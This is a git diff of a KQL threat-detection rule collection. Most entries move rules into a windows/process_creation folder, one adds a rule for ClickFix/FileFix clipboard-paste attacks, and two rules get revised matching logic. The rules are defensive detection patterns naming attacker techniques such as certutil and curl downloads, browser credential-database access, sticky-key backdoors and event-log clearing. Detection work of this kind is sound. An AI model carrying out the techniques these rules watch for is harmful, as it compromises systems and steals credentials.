a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql similarity index 100% rename from KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql rename to KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql diff --git a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql rename to KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql diff --git a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql similarity index 100% rename from KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql rename to KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql diff --git a/KQL/rules/Persistence/shimcache_flush.kql b/KQL/rules/windows/process_creation/shimcache_flush.kql similarity index 100% rename from KQL/rules/Persistence/shimcache_flush.kql rename to KQL/rules/windows/process_creation/shimcache_flush.kql diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql similarity index 100% rename from KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql rename to KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql diff --git a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql similarity index 100% rename from KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql rename to KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql diff --git a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql similarity index 100% rename from KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql rename to KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql diff --git a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql b/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql similarity index 100% rename from KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql rename to KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql diff --git a/KQL/rules/Execution/start_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql similarity index 100% rename from KQL/rules/Execution/start_windows_service_via_net_exe.kql rename to KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql b/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql rename to KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql diff --git a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql similarity index 100% rename from KQL/rules/Impact/stop_windows_service_via_net_exe.kql rename to KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql diff --git a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql similarity index 100% rename from KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql rename to KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql diff --git a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql similarity index 100% rename from KQL/rules/Impact/stop_windows_service_via_sc_exe.kql rename to KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql diff --git a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql b/KQL/rules/windows/process_creation/suspect_svchost_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspect_svchost_activity.kql rename to KQL/rules/windows/process_creation/suspect_svchost_activity.kql diff --git a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql rename to KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql diff --git a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql rename to KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql rename to KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql rename to KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql diff --git a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql similarity index 100% rename from KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql rename to KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql rename to KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql rename to KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_calculator_usage.kql rename to KQL/rules/windows/process_creation/suspicious_calculator_usage.kql diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql rename to KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql b/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql diff --git a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql diff --git a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql diff --git a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql rename to KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql diff --git a/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql new file mode 100644 index 00000000..16d162b2 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql @@ -0,0 +1,13 @@ +// Title: Suspicious ClickFix/FileFix Execution Pattern +// Author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-19 +// Level: high +// Description: Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix). +// Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.001, attack.t1204.004 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") and (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql rename to KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql rename to KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql diff --git a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql b/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql rename to KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql similarity index 69% rename from KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql rename to KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql index 03e79ea8..bca8698f 100644 --- a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql +++ b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql @@ -12,4 +12,4 @@ // - When the command contains the keywords but not in the correct order DeviceProcessEvents -| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file +| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ProcessCommandLine matches regex "(?i)\\s['"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)" and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql b/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql rename to KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql diff --git a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql b/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_curl_exe_download.kql rename to KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql rename to KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql diff --git a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql rename to KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql b/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql rename to KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql diff --git a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql rename to KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql diff --git a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql rename to KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql diff --git a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql rename to KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql diff --git a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql rename to KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql rename to KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql rename to KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql diff --git a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql b/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_download_from_office_domain.kql rename to KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql diff --git a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql b/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql rename to KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql similarity index 100% rename from KQL/rules/Execution/suspicious_electron_application_child_processes.kql rename to KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql diff --git a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql similarity index 100% rename from KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql rename to KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql diff --git a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql b/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql similarity index 100% rename from KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql rename to KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql rename to KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql diff --git a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql rename to KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql diff --git a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql rename to KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql diff --git a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_execution_of_hostname.kql rename to KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql diff --git a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql rename to KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql diff --git a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql similarity index 100% rename from KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql rename to KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql similarity index 100% rename from KQL/rules/Impact/suspicious_execution_of_shutdown.kql rename to KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql similarity index 100% rename from KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql rename to KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql diff --git a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql rename to KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql similarity index 50% rename from KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql rename to KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql index 58552aa1..367eadf6 100644 --- a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql +++ b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql @@ -9,4 +9,4 @@ // Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 DeviceProcessEvents -| where (ProcessCommandLine contains "#" and FolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file +| where (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe") and (ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains "            " or ProcessCommandLine contains " ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_extrac32_alternate_data_stream_execution.kql rename to KQL/rules/windows/process_creation/suspicious_extrac32_alternate_data_stream_execution.kql diff --git a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql b/KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_extrac32_execution.kql rename to KQL/rules/windows/process_creation/suspicious_extrac32_execution.kql diff --git a/KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql b/KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql rename to KQL/rules/windows/process_creation/suspicious_file_characteristics_due_to_missing_fields.kql diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql diff --git a/KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_curl_exe.kql diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe.kql diff --git a/KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql b/KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql rename to KQL/rules/windows/process_creation/suspicious_file_download_from_ip_via_wget_exe_paths.kql diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_file_encoded_to_base64_via_certutil_exe.kql diff --git a/KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql b/KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql similarity index 100% rename from KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql rename to 